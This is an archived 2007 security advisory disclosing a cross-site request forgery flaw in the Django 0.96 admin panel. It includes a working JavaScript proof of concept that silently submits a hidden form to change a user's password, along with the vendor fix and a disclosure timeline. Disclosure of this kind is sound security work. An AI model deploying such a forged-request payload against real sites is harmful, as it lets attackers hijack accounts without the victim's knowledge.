lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 29 Oct 2007 17:29:36 -0600 From: "J. Carlos Nieto" <xiam@...m.be> To: bugtraq@...urityfocus.com Subject: Django 0.96 (stable) Admin Panel CSRF Author: J. Carlos Nieto. Date: Oct 21, 2007 There exists a security hole in the default django's admin panel. Background ========== Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that allows a person with admin privileges to modify the database tables, it allows to change any user password too. See more at http://www.djangoproject.com Summary ======= django has, by default, no CSRF protection, this may allow an attacker to change any user password by tricking a victim with admin privileges into a special forged web page (even in a a totally different server) that sends a request to change the password of the user with id = n. The victim does not know that the form was sent. If the victim has admin privileges the exploit will succeed, otherwise nothing will happen. Severity ======== Mild. This problem exists only with the default installation and can be easily solved using a middleware found in here: http://www.djangoproject.com/documentation/csrf/. Proof of concept ================ <script type="text/javascript"> window.onload = function() { var url = "http://127.0.0.1:8000/admin/auth/user/1/password/"; var pass = "funky"; var param = { password1: pass, password2: pass }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement('<input name="'+i+'">'); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); } </script> <iframe name="hidden" style="display: none"></iframe> Solution ======== Use the django's CSRF protection in all your applications. Take a look at http://www.djangoproject.com/documentation/csrf/. Disclosure Timeline =================== 2007.10.18 - Vulnerability found 2007.10.18 - Vulnerability reported to vendor 2007.10.18 - Vendor response 2007.10.21 - Advisory release License ======= Copyright 2007 J. Carlos Nieto The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
Powered by blists - more mailing lists